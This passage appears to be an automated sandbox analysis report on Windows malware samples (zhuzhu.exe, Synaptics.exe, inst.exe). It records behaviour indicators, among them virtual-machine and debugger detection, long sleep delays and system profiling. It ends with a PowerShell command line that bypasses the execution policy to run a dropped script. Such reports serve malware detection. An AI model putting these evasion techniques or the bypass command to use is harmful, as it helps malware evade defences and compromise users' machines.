                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX

                                      Malware Analysis System Evasion

                                      Source: C:\Users\user\Downloads\inst.exeCode function: _memset,GetUserNameW,__wcsicoll,_memset,GetModuleFileNameW,StrStrIW,7_2_001B8A46
                                      Source: C:\Users\user\Downloads\inst.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : ASSOCIATORS OF {Win32_DiskPartition.DeviceID='Disk #0, Partition #1'} where ResultClass = Win32_DiskDrive
                                      Source: C:\Users\user\Downloads\inst.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : select * from Win32_DiskDriveToDiskPartition where Dependent="Win32_DiskPartition.DeviceID=\"Disk #0, Partition #1\""
                                      Source: C:\Users\user\Downloads\inst.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : ASSOCIATORS OF {Win32_LogicalDisk.DeviceID='C:'} where ResultClass = Win32_DiskPartition
                                      Source: C:\Users\user\Downloads\inst.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : select * from Win32_LogicalDiskToPartition where Dependent="Win32_LogicalDisk.DeviceID=\"C:\""
                                      Source: C:\Users\user\Downloads\inst.exeCode function: _malloc,GetAdaptersInfo,_malloc,GetAdaptersInfo,7_2_001A67A4
                                      Source: C:\Users\user\Downloads\inst.exeCode function: _malloc,GetAdaptersInfo,_malloc,GetAdaptersInfo,7_2_001C88EB
                                      Source: C:\Users\user\Downloads\inst.exeCode function: GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,__wcsicoll,StrStrIA,StrStrIA,StrStrIA,GetProcessHeap,GetProcessHeap,HeapFree,7_2_00174BD0
                                      Source: C:\Users\user\Downloads\inst.exeCode function: GetAdaptersInfo,GetTickCount,_sprintf,7_2_5F4EA873
                                      Source: C:\Users\user\Downloads\inst.exeCode function: GetAdaptersInfo,GetAdaptersInfo,12_2_001A67A4
                                      Source: C:\Users\user\Downloads\inst.exeCode function: GetAdaptersInfo,GetAdaptersInfo,12_2_001C88EB
                                      Source: C:\Users\user\Downloads\inst.exeCode function: GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,__wcsicoll,StrStrIA,StrStrIA,StrStrIA,GetProcessHeap,GetProcessHeap,HeapFree,12_2_00174BD0
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeWindow / User API: threadDelayed 3833
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeWindow / User API: threadDelayed 3177
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeWindow / User API: threadDelayed 2030
                                      Source: C:\Users\user\Downloads\inst.exeWindow / User API: threadDelayed 4046
                                      Source: C:\Users\user\Downloads\inst.exeWindow / User API: threadDelayed 5897
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5263
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1287
                                      Source: C:\Windows\splwow64.exeWindow / User API: threadDelayed 9872
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_1-10062
                                      Source: C:\Users\user\Downloads\inst.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\{A44B7723-4283-41b8-B9C0-6B1983C61382}.tmp\sites.dll
                                      Source: C:\Users\user\Downloads\inst.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\{92EE34F9-CBF9-4899-A446-C0FD9C9E29A7}.tmp\360P2SP.dll
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeEvasive API call chain: RegQueryValue,DecisionNodes,Sleepgraph_4-43941
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_4-43939
                                      Source: C:\Users\user\Downloads\inst.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_7-76695
                                      Source: C:\Users\user\Downloads\inst.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
                                      Source: C:\Users\user\Downloads\inst.exeAPI coverage: 0.7 %
                                      Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 7312Thread sleep time: -4380000s >= -30000s
                                      Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 5184Thread sleep time: -60000s >= -30000s
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exe TID: 7432Thread sleep time: -30000s >= -30000s
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exe TID: 3428Thread sleep time: -3833000s >= -30000s
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exe TID: 4412Thread sleep time: -31770s >= -30000s
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exe TID: 3428Thread sleep time: -2030000s >= -30000s
                                      Source: C:\Users\user\Downloads\inst.exe TID: 8012Thread sleep time: -6069000s >= -30000s
                                      Source: C:\Users\user\Downloads\inst.exe TID: 8012Thread sleep time: -8845500s >= -30000s
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7744Thread sleep count: 5263 > 30
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7724Thread sleep count: 1287 > 30
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7832Thread sleep time: -3689348814741908s >= -30000s
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7788Thread sleep time: -922337203685477s >= -30000s
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7760Thread sleep count: 43 > 30
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7672Thread sleep time: -922337203685477s >= -30000s
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7764Thread sleep time: -922337203685477s >= -30000s
                                      Source: C:\Users\user\Downloads\inst.exeFile opened: PhysicalDrive0
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                      Source: C:\Windows\splwow64.exeLast function: Thread delayed
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeThread sleep count: Count: 3177 delay: -10
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeFile Volume queried: C:\ FullSizeInformation
                                      Source: C:\Users\user\Downloads\inst.exeFile Volume queried: C:\Windows\SysWOW64 FullSizeInformation
                                      Source: C:\Users\user\Downloads\inst.exeFile Volume queried: C:\ FullSizeInformation
                                      Source: C:\Users\user\Downloads\inst.exeFile Volume queried: C:\Users\user\AppData\Local\Temp\{A44B7723-4283-41b8-B9C0-6B1983C61382}.tmp\themes FullSizeInformation
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 7_2_001BD71E FindFirstFileW,GetFullPathNameW,SetLastError,lstrlenW,_wcsrchr,_wcsrchr,7_2_001BD71E
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 7_2_001CD670 _memset,FindFirstFileW,FindNextFileW,FindClose,7_2_001CD670
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 7_2_001C3FB0 PathFileExistsW,_wcslen,_memset,_memset,PathAppendW,PathAppendW,PathAppendW,FindFirstFileW,FindNextFileW,_memset,PathAppendW,PathAppendW,_memset,PathAppendW,PathAppendW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,7_2_001C3FB0
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 7_2_5F52A6BA _wcspbrk,__getdrive,FindFirstFileW,_wcspbrk,__wfullpath_helper,_wcslen,GetDriveTypeW,___loctotime64_t,__wsopen_s,__fstat64i32,__close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,7_2_5F52A6BA
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 12_2_001CD670 _memset,FindFirstFileW,FindNextFileW,FindClose,12_2_001CD670
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 12_2_001BD71E FindFirstFileW,GetFullPathNameW,SetLastError,lstrlenW,_wcsrchr,_wcsrchr,12_2_001BD71E
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 12_2_001C3FB0 PathFileExistsW,_wcslen,_memset,_memset,PathAppendW,PathAppendW,PathAppendW,FindFirstFileW,FindNextFileW,_memset,PathAppendW,PathAppendW,_memset,PathAppendW,PathAppendW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,12_2_001C3FB0
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: 4_2_037780F0 wsprintfW,GetLogicalDriveStringsW,lstrcmpiW,lstrcmpiW,QueryDosDeviceW,lstrlenW,__wcsnicmp,lstrcpyW,lstrcpyW,lstrcatW,4_2_037780F0
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: 4_2_03775430 _memset,_memset,_memset,gethostname,gethostbyname,inet_ntoa,_strcat_s,_strcat_s,inet_ntoa,_strcat_s,_strcat_s,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,GetLastInputInfo,GetTickCount,wsprintfW,wsprintfW,MultiByteToWideChar,MultiByteToWideChar,GetSystemInfo,wsprintfW,GetForegroundWindow,GetWindowTextW,lstrlenW,lstrlenW,GetModuleHandleW,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,wsprintfW,GetCurrentProcessId,OpenProcess,K32GetProcessImageFileNameW,CloseHandle,GetTickCount,__time64,__localtime64,wsprintfW,GetLocaleInfoW,GetSystemDirectoryW,GetCurrentHwProfileW,4_2_03775430
                                      Source: C:\ProgramData\Synaptics\Synaptics.exeThread delayed: delay time: 60000
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeThread delayed: delay time: 30000
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                      Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000
                                      Source: C:\Users\user\Desktop\zhuzhu.exeFile opened: C:\Users\user\AppData\Roaming
                                      Source: C:\Users\user\Desktop\zhuzhu.exeFile opened: C:\Users\user
                                      Source: C:\Users\user\Desktop\zhuzhu.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
                                      Source: C:\Users\user\Desktop\zhuzhu.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
                                      Source: C:\Users\user\Desktop\zhuzhu.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini
                                      Source: C:\Users\user\Desktop\zhuzhu.exeFile opened: C:\Users\user\AppData
                                      Source: zhuzhu.exe, ._cache_zhuzhu.exe.1.dr, ._cache_zhuzhu.exe.0.dr, Synaptics.exe.0.drBinary or memory string: !Datacenter without Hyper-V (core)
                                      Source: Amcache.hve.22.drBinary or memory string: VMware
                                      Source: inst.exe, 0000000C.00000002.1778901612.000000000021E000.00000002.00000001.01000000.0000000C.sdmpBinary or memory string: vVIRTUAL SCSIVIRTUAL HDVIRTUAL DISKISCSIRED HAT VIRTIORAMDISKRAM-DISKRAM DISKRAID ARRAYRAID10RAID5RAID1XENSRC XEN VMWAREVBOX HARDDISKQEMU HARDDISKPROMISE 1+0MSFT VIRTUALMICROSOFTMARVELL RAIDLSILOGICLSI MR92LSI MEGALENOVO_RAIDINTEL RAIDIBM SERVERAIDDELL PERCAMD-RAID ARRAYADAPTECRAID0SOFTWARE\360Safe\softmgr\dioraidRAIDIM2S313BR240G BR128G BR120G BR60G 256GB 256GB 256G 256G 240GB 128GB 128GB 128G 128G 120GB 120G
                                      Source: zhuzhu.exe, ._cache_zhuzhu.exe.1.dr, ._cache_zhuzhu.exe.0.dr, Synaptics.exe.0.drBinary or memory string: without Hyper-V for WESS
                                      Source: Amcache.hve.22.drBinary or memory string: VMware Virtual USB Mouse
                                      Source: Amcache.hve.22.drBinary or memory string: vmci.syshbin
                                      Source: zhuzhu.exe, ._cache_zhuzhu.exe.1.dr, ._cache_zhuzhu.exe.0.dr, Synaptics.exe.0.drBinary or memory string: Datacenter without Hyper-V
                                      Source: Amcache.hve.22.drBinary or memory string: VMware, Inc.
                                      Source: zhuzhu.exe, ._cache_zhuzhu.exe.1.dr, ._cache_zhuzhu.exe.0.dr, Synaptics.exe.0.drBinary or memory string: !Enterprise without Hyper-V (core)
                                      Source: Amcache.hve.22.drBinary or memory string: VMware20,1hbin@
                                      Source: Amcache.hve.22.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                                      Source: Amcache.hve.22.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                                      Source: Amcache.hve.22.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                                      Source: zhuzhu.exe, ._cache_zhuzhu.exe.1.dr, ._cache_zhuzhu.exe.0.dr, Synaptics.exe.0.drBinary or memory string: Standard without Hyper-V
                                      Source: ._cache_zhuzhu.exe, 00000001.00000003.1771155564.0000000000B08000.00000004.00000020.00020000.00000000.sdmp, ._cache_zhuzhu.exe, 00000001.00000003.1771155564.0000000000B57000.00000004.00000020.00020000.00000000.sdmp, ._cache_zhuzhu.exe, 00000001.00000002.1773595012.0000000000B26000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2434252916.000000000062C000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 00000007.00000002.4149076831.0000000000E7E000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 00000007.00000003.1806696801.0000000000F52000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 00000007.00000003.1807464472.0000000002DD1000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 00000007.00000002.4149076831.0000000000F52000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 00000007.00000002.4151548891.0000000002DE3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                                      Source: Amcache.hve.22.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                                      Source: Synaptics.exe, 00000002.00000002.2434252916.00000000005F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(
                                      Source: zhuzhu.exe, ._cache_zhuzhu.exe.1.dr, ._cache_zhuzhu.exe.0.dr, Synaptics.exe.0.drBinary or memory string: Enterprise without Hyper-V
                                      Source: Amcache.hve.22.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                                      Source: zhuzhu.exe, ._cache_zhuzhu.exe.1.dr, ._cache_zhuzhu.exe.0.dr, Synaptics.exe.0.drBinary or memory string: HPC Edition without Hyper-V
                                      Source: Amcache.hve.22.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                                      Source: Amcache.hve.22.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                                      Source: ._cache_zhuzhu.exe, 00000004.00000002.4148926208.0000000000BA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                      Source: zhuzhu.exe, ._cache_zhuzhu.exe.1.dr, ._cache_zhuzhu.exe.0.dr, Synaptics.exe.0.drBinary or memory string: Hyper-V Server
                                      Source: Amcache.hve.22.drBinary or memory string: vmci.sys
                                      Source: Amcache.hve.22.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                                      Source: Amcache.hve.22.drBinary or memory string: vmci.syshbin`
                                      Source: Amcache.hve.22.drBinary or memory string: \driver\vmci,\driver\pci
                                      Source: zhuzhu.exe, ._cache_zhuzhu.exe.1.dr, ._cache_zhuzhu.exe.0.dr, Synaptics.exe.0.drBinary or memory string: Datacenter without Hyper-V (core)
                                      Source: Amcache.hve.22.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                                      Source: Amcache.hve.22.drBinary or memory string: VMware20,1
                                      Source: Amcache.hve.22.drBinary or memory string: Microsoft Hyper-V Generation Counter
                                      Source: Amcache.hve.22.drBinary or memory string: NECVMWar VMware SATA CD00
                                      Source: Amcache.hve.22.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                                      Source: Amcache.hve.22.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                                      Source: Amcache.hve.22.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                                      Source: Amcache.hve.22.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                                      Source: Amcache.hve.22.drBinary or memory string: VMware PCI VMCI Bus Device
                                      Source: zhuzhu.exe, ._cache_zhuzhu.exe.1.dr, ._cache_zhuzhu.exe.0.dr, Synaptics.exe.0.drBinary or memory string: Enterprise without Hyper-V (core)
                                      Source: Amcache.hve.22.drBinary or memory string: VMware VMCI Bus Device
                                      Source: Amcache.hve.22.drBinary or memory string: VMware Virtual RAM
                                      Source: Amcache.hve.22.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                                      Source: zhuzhu.exe, ._cache_zhuzhu.exe.1.dr, ._cache_zhuzhu.exe.0.dr, Synaptics.exe.0.drBinary or memory string: Standard without Hyper-V (core)
                                      Source: Amcache.hve.22.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeAPI call chain: ExitProcess graph end nodegraph_4-43509
                                      Source: C:\Users\user\Downloads\inst.exeAPI call chain: ExitProcess graph end nodegraph_7-78452
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeProcess information queried: ProcessInformation
                                      Source: C:\ProgramData\Synaptics\Synaptics.exeProcess queried: DebugPort
                                      Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 2_2_25ABFF09 LdrInitializeThunk,2_2_25ABFF09
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeCode function: 1_2_1001124D IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_1001124D
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 7_2_00169CD0 GetCurrentThreadId,GetProcessHeap,OpenThread,OpenThread,GetLastError,GetProcessHeap,HeapFree,OutputDebugStringW,CloseHandle,7_2_00169CD0
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: 4_2_0378054D VirtualProtect ?,-00000001,00000104,?4_2_0378054D
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeCode function: 1_2_10001170 LoadLibraryW,GetProcAddress,GetProcAddress,GetModuleHandleA,RegisterClassW,CreateWindowExW,GetMessageW,TranslateMessage,DispatchMessageW,1_2_10001170
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeCode function: 1_2_02860AE4 mov eax, dword ptr fs:[00000030h]1_2_02860AE4
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: 4_2_02BD0AE4 mov eax, dword ptr fs:[00000030h]4_2_02BD0AE4
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: 4_2_035F00CD mov eax, dword ptr fs:[00000030h]4_2_035F00CD
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: 4_2_03776790 wsprintfW,GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,LookupAccountSidW,GetLastError,GetProcessHeap,HeapFree,4_2_03776790
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeProcess token adjusted: Debug
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeCode function: 1_2_1001154A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_1001154A
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeCode function: 1_2_1001124D IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_1001124D
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeCode function: 1_2_02871521 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_02871521
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeCode function: 1_2_02871520 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_02871520
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: 4_2_0377DF10 Sleep,CloseHandle,GetLocalTime,wsprintfW,SetUnhandledExceptionFilter,CloseHandle,EnumWindows,EnumWindows,Sleep,EnumWindows,Sleep,CreateEventA,Sleep,RegOpenKeyExW,RegQueryValueExW,CloseHandle,Sleep,WaitForSingleObject,CloseHandle,Sleep,CloseHandle,WaitForSingleObject,CloseHandle,Sleep,CloseHandle,4_2_0377DF10
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: 4_2_0377F00A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_0377F00A
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: 4_2_03781F67 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_03781F67
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: 4_2_02C66815 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_02C66815
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: 4_2_02C68587 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_02C68587
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 7_2_001EA44A _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_001EA44A
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 7_2_001E4647 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_001E4647
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 7_2_001E116F __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_001E116F
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 7_2_001E18F6 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_001E18F6
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 7_2_5F537A51 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_5F537A51
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 12_2_001E4647 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_001E4647
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 12_2_001E116F _raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_001E116F
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 12_2_001E18F6 _raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_001E18F6

                                      HIPS / PFW / Operating System Protection Evasion

                                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
